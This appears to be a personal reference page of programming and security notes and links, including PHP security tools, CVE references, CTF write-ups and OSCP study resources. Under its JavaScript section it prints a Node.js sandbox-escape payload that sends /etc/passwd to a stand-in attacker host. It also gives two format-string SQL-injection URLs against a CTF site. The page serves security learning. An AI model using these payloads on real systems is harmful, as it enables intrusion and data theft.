virtualenv -p /usr/bin/python2.7 venv
. ./venv/bin/activate

Python 3

python3 -m venv ~/Documents/venv
. ~/Documents/venv/bin/activate

Lua

Sandbox Bypass

CTF Challenge

• TCP1P-CTF-2023-Challenges/Misc/Landbox/main.lua

PHP

• PHP: サポートするプロトコル/ラッパー
• PHP Sandbox - Execute PHP code online through your browser
• Local File Inclusion (LFI) Explained, Examples & How to Test
• RIPS - free PHP security scanner using static code analysis
• PHP Internals Book

Dangerous PHP Functions

• Dangerous PHP Functions
• psecio/parse - Parse: A Static Security Scanner
• Sink: rips/config/sinks.php
• Source: rips/config/sources.php

Analysis

• security - Dynamic Analysis of PHP Web Applications to identify work flow deviations - Stack Overflow
• Paros download | SourceForge.net
• PHP String Analyzer

Tools

• phpstan/phpstan - PHP Static Analysis Tool - discover bugs in your code without running it!

PHP Vulnerability Hunter

• php-vulnerability-hunter | Google Code Archive
• PHP Vulnerability Hunter v.1.1.4.6 - Automated fuzz testing tool
• robocoder/phpvh
• Security-Shell
• PHP Vulnerability Hunter - Downloads
• PHP Vulnerability Hunter – CodePlex Archive

Argument parser example

• less.php/bin/lessc

Tested environment in Docker Compose

Dockerfile

FROM php:8.3-apache-bullseye

WORKDIR /var/www/html

RUN docker-php-ext-install mysqli && \
    mv "$PHP_INI_DIR/php.ini-production" "$PHP_INI_DIR/php.ini" && \
    rm -fr /var/log/apache2/* && \
    apt-get update && \
    apt-get install -y vim libtidy-dev libbz2-dev libicu-dev libzip-dev libpng-dev libjpeg-dev && \
    docker-php-ext-configure gd --with-jpeg && \
    docker-php-ext-install gettext tidy exif bz2 intl zip gd

# zenphoto
RUN curl -L -o /tmp/zenphoto.tar.gz https://github.com/zenphoto/zenphoto/archive/v1.6.1.tar.gz && \
    tar zxf /tmp/zenphoto.tar.gz -C /var/www/html/ --strip-components 1 && \
    chown www-data:www-data -R /var/www/html

docker-compose.yml

version: '3'
services:
  web:
    build: .
    ports:
      - "80:80"
    depends_on:
      - db

  db:
    image: mysql:8-debian
    ports:
      - "3306:3306"
    environment:
      - MYSQL_ROOT_PASSWORD=password
      - MYSQL_DATABASE=db

Vulnerability

• CVE-2023-47130 - Yii unserialize() RCE
• CVE-2023-47444 - OpenCart 4.0.0.0 to 4.0.2.3 RCE
  • Static Code Injections in OpenCart (CVE-2023-47444)

Type Juggling

• Type Juggling - Payloads All The Things

Format String Injection

• Testing for Format String Injection
• 1337UP web/OWASP

https://owasp.ctf.intigriti.io/search.php?a=%1$s) AND 0;--&id=1 https://owasp.ctf.intigriti.io/search.php?id=(%1$s&title=in title) OR 0 AND POSITION(

JavaScript

• de4js - JavaScript Deobfuscator and Unpacker
• Online Brainfuck Compiler

Payload

• JSFuck
• NodeJS-Red-Team-Cheat-Sheet
• Breaking out of node.js sandbox

var func = arguments.callee.caller.arguments.callee.caller.arguments.callee.caller.arguments.callee.arguments.callee.caller.arguments.callee.caller;
func.call(func, "var fs = process.mainModule.require('fs');var http = process.mainModule.require('http');var req = http.request({host: 'evil.domain.com'}); req.write(fs.readFileSync('/etc/passwd').toString());req.end();");

Ruby

CVE-2019-5420: Deserialization to RCE

If secret_key_base is leaked, RCE is possible.

• CVE-2019-5420
• Report #473888 - RCE which may occur due to ActiveSupport::MessageVerifier or ActiveSupport::MessageEncryptor (especially Active storage) | HackerOne
• DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit) - Linux remote Exploit

Rails Deserialization

• Railsの上で走る - ooooooo_qの日記
• Deserialization on Rails

File Content Disclosure vulnerability

• CVE-2019-5418

CVE-2021-43609: SQLi2RCE in Spiceworks Help Desk Server (HDS)

• CVE-2021-43609
• d5sec/CVE-2021-43609-POC
• CVE-2021-43609 Write-up | LinkedIn

Scheme

• Practical Scheme

Java

Decompile

• jd-gui

  • compile without comment and metadata Help > Preferences > Source Saver Class file > uncheck

    • Write original line numbers
    • Write metadata

    

• jadx

  /usr/share/jadx/bin/jadx test.jar

Erlang

• Learn You Some Erlang for Great Good!

Common Lisp

• awesome-cl - A curated list of awesome Common Lisp frameworks, libraries and other shiny stuff.

C++

• Stroustrup: C++

PowerShell

Similar with tail in Linux

Get-Content -Path <file path> -Tail 10 -Wait

Markdown

• markdownlint
• markdown-toc
• node-markdown-spellcheck

# Fix
markdownlint -c ~/.markdownlint.yaml -f README.md

# TOC: https://github.com/jonschlinkert/markdown-toc/issues/14
markdown-toc --maxdepth 4 --bullets='-' -i README.md

mdspell --report --ignore-acronyms --ignore-numbers --en-us README.md

Sandbox Service

• Rextester

Source Code Hosting

• GitHosting
• GitHub
• Projects · GitLab
• Bitbucket | Git solution for teams using Jira
• Sourcegraph | Code AI platform
• SourceForge
• Plex (unavailable)
• Gitee
  • Explore - Gitea: Git with a cup of tea
• Gogs

Data Structures & Algorithms

Dijkstra's algorithm

• NetworkX — NetworkX documentation
  • shortest_path — NetworkX 3.2.1 documentation
• TUCTF 2023 Secret Agent Writeup

import networkx as nx

edge_list = [
    ("Attaya", "Belandris", 10),
    ("Attaya", "Charity", 3),
    ("Attaya", "Delato", 5),
    ("Belandris", "Jolat", 15),
    ("Belandris", "Gevani", 8),
    ("Belandris", "Emell", 1),
    ("Charity", "Belandris", 8),
    ("Charity", "Emell", 2),
    ("Charity", "Flais", 8),
    ("Charity", "Haphsa", 3),
    ("Charity", "Delato", 1),
    ("Delato", "Flais", 5),
    ("Delato", "Iyona", 5),
    ("Delato", "Belandris", 3),
    ("Emell", "Gevani", 5),
    ("Emell", "Iyona", 3),
    ("Emell", "Flais", 5),
    ("Flais", "Gevani", 3),
    ("Flais", "Iyona", 3),
    ("Flais", "Haphsa", 1),
    ("Gevani", "Jolat", 8),
    ("Gevani", "Iyona", 1),
    ("Gevani", "Haphsa", 6),
    ("Haphsa", "Iyona", 8),
    ("Haphsa", "Kepliker", 7),
    ("Haphsa", "Melyphora", 8),
    ("Haphsa", "Queria", 10),
    ("Haphsa", "Delato", 1),
    ("Iyona", "Jolat", 15),
    ("Iyona", "Leter", 4),
    ("Iyona", "Kepliker", 3),
    ("Jolat", "Leter", 4),
    ("Jolat", "Kepliker", 5),
    ("Jolat", "Osiros", 7),
    ("Kepliker", "Leter", 5),
    ("Kepliker", "Osiros", 2),
    ("Kepliker", "Partamo", 6),
    ("Kepliker", "Queria", 7),
    ("Kepliker", "Delato", 2),
    ("Kepliker", "Melyphora", 5),
    ("Leter", "Osiros", 3),
    ("Leter", "Rhenora", 10),
    ("Melyphora", "Partamo", 4),
    ("Melyphora", "Shariot", 11),
    ("Melyphora", "Queria", 1),
    ("Notasto", "Shariot", 7),
    ("Osiros", "Shariot", 8),
    ("Osiros", "Rhenora", 6),
    ("Partamo", "Osiros", 1),
    ("Partamo", "Rhenora", 5),
    ("Partamo", "Shariot", 9),
    ("Queria", "Partamo", 1),
    ("Queria", "Rhenora", 6),
    ("Queria", "Shariot", 10),
    ("Rhenora", "Notasto", 2),
    ("Rhenora", "Shariot", 1),
]

G = nx.DiGraph()
G.add_weighted_edges_from(edge_list)

assert len(G.nodes) == 19

sl = nx.shortest_path(G, source="Attaya", target="Shariot", weight="weight")
print(sl)

Computer Scinence

• ossu/computer-science
• ianw/bottomupcs
• Teach Yourself Computer Science

Machine Learning / Deep Learning

• List of datasets for machine-learning research - Wikipedia
• ChristosChristofidis/awesome-deep-learning
• udlbook

Emacs

• Query Replace (GNU Emacs Manual)

markdown-mode

C-c C-b     markdown-outline-previous-same-level
C-c C-d     markdown-do
C-c C-f     markdown-outline-next-same-level
C-c C-s Q markdown-blockquote-region

• Line Truncation (GNU Emacs Manual)

Horizontal scrolling automatically causes line truncation (see Horizontal Scrolling). You can explicitly enable line truncation for a particular buffer with the command C-x x t (toggle-truncate-lines).

Static Site Generator

• Static Site Generators - Top Open Source SSGs | Jamstack
• Hugo
  • athul/archie
  • Slonser Notes | Home
• Hexo
  • minos

Certificates

• Security Certification Roadmap

OSCP (Offensive Security Certified Professional)

Official Link

• Sign in
• PEN-200: Penetration Testing Certification with Kali Linux | OffSec
• OffSec Forums
• Offsec Support Portal
  • OSCP Exam Guide (Newly Updated) – OffSec Support Portal
  • OSCP Exam FAQ (Newly Updated) – OffSec Support Portal
  • Course Specific Resources for Offsec Students – OffSec Support Portal
  • OSCP Exam Guide (Newly Updated) – OffSec Support Portal
• PEN-200 and the OSCP - OSCP Overview
• OSCP 2 - OSCP Prep slide by Michael Mancao in February 22, 2022

Journey

• OSCP合格までの道のりとそこから学んだこと
• OSCP: ペネトレーションテストの難関資格を取った話 - ommadawn46's blog
• The Journey to Try Harder: TJnull’s Preparation Guide for PWK/OSCP | NetSec Focus
• From (Almost) 0x0 to OSCP: My Journey to become OSCP | by Louis Low | Medium
• OSCP Preparation Guide - Adithyan's Blog
• How I passed the OSCP in 7 hours on my first attempt
• How To Pass Your OSCP Exam (New Exam Format) | by Dw3113r | Medium

Preparation

• 資格「OSCP」について. 概要 | by syuya yuikura | 這いよれ Pentest Lab | Medium
• OSCPとは？効果的な勉強法を徹底解説 | Computer Futures
• A Detailed Guide on OSCP Preparation - From Newbie to OSCP - Checkmate

Tools

netcat

• original nc110.tgz

check file

$ md5sum nc110.tgz
402632f2fe01c169ff19a0ad6e9d608c  nc110.tgz

$ mkdir nc110 && tar xf nc110.tgz -C nc110

$ find nc110 -type f | xargs md5sum
0db440646515384cbfd94a235a90f3ed  nc110/stupidh
330ffaaaac7d40e36bb63740fded5c01  nc110/Changelog
f1557018bf57b2ca74c68d44c03ddd91  nc110/README
9388ded7183a909a8fa191118e3d62b1  nc110/Makefile
eb3bcb13d36395d0b09a3ef66b2ca2ff  nc110/scripts/webrelay
5413b15cbbc1fb54ef472f86e7bc78da  nc110/scripts/README
430a1b955ad2da1fc053985423a52f17  nc110/scripts/probe
544c19da387112fa40ca7926e77aeb1b  nc110/scripts/alta
a8ec4e32660d14c1df15498e7b890c41  nc110/scripts/iscan
e319e17eb956b8a4c65d5582584ba0bb  nc110/scripts/dist.sh
fa679307322bb3f379877b19afd116ac  nc110/scripts/ncp
8c787e1a2a17d235a39b95c3d29daf9a  nc110/scripts/irc
f1570f4c5cc27216ad800e7bf023c4d3  nc110/scripts/websearch
393193b684e0efb135e8459aecf6900b  nc110/scripts/webproxy
6f15c855fff0cdeeb8c08ab7e2c28b60  nc110/scripts/bsh
04b7816212812a57e24e7e0dfa142088  nc110/scripts/web
9faa53dcf7446e40bbe72706c1ec3226  nc110/netcat.blurb
4bf5f11beccbf28fc656264cdc9785ed  nc110/netcat.c
68f9547b38b241cdef32c7ec558b3293  nc110/data/rip.d
3d26e127b9691586d6a80f736ab461c2  nc110/data/README
6ab8dee297f6e8d84061d848a68cfa4e  nc110/data/Makefile
450cf107e0ff9aec8025d058a7502c79  nc110/data/dns-any.d
bddf26f2c1029936692f8bcd8bd5262d  nc110/data/rservice.c
f3d280c86c2121b03df1e08b97e13091  nc110/data/pmap-mnt.d
7c641a3ad03f05c19645c1369dffea23  nc110/data/xor.c
e181220d9394b28982b20ecbb484e019  nc110/data/nfs-0.d
f7a39541dc2422ccbbbb2e2154208926  nc110/data/pmap-dump.d
cc82f9ecc16219019860a907b595cfd2  nc110/data/pm.d
08bc597b20299be9241ef13763b27ed7  nc110/data/showmount.d
c7aae64a82d56171225c64892a291366  nc110/data/data.c
03f2a43f230d5139aa21cd55ba7f1d8c  nc110/generic.h

• GNU Netcat
• Ncat (Nmap implementation)

Media

Book

• Amazon.com - A Bug Hunter's Reading List
• The Tangled Web: A Guide to Securing Modern Web Applications

Scholarly Articles, Academic Paper

• arXiv.org e-Print archive

Video

• LiveOverflow
• IppSec
• 0xdf

Podcast

• Darknet Diaries

Stuff

• index - hacking
• onlurking/awesome-infosec
• CWE - Common Weakness Enumeration
• Home | Zero Day Initiative
• How To Become A Hacker: Japanese
• Emulator 101 - Welcome
• 賢い質問のしかた
• インシデント指揮官トレーニングの手引き | Yakst
• セキュリティエンジニアを3年続けて分かったおすすめ勉強法
• 政府情報システムにおける 脆弱性診断導入ガイドライン

XPS9320 firmware

• fwupd - ArchWiki

Clipboard Copy

• SPICE vdagent